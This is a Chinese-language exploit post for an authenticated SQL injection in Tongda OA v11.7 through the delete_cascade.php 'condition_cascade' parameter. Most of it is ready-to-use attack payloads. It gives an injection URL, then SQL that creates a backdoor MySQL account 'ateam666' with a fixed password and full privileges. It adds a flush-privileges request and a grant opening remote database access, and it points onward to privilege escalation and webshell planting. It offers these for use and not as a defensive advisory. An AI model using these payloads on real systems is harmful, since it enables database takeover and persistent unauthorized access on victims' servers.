通达OA v11.7 后台SQL注入

利用条件

需要登录权限

原文作者给出了利用链注入加mysql权限，又是写木马的。用起来很舒服

/general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((substr(user(),1,1)=%27r%27),1,power(9999,99))

1、添加一个mysql用户

grant all privileges ON mysql.* TO 'ateam666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

2、给创建的ateam666账户添加mysql权限。

UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('ateam666' AS Binary(5));

3、刷新数据库就可以登录到数据库啦。

/general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;

4、通达OA配置mysql默认是不开启外网访问的所以需要修改mysql授权登录。

/general/hr/manage/query/delete_cascade.php?condition_cascade=

grant all privileges ON mysql.* TO 'ateam666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

5、接下来就是考验mysql提权功底的时候啦

参考链接：https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw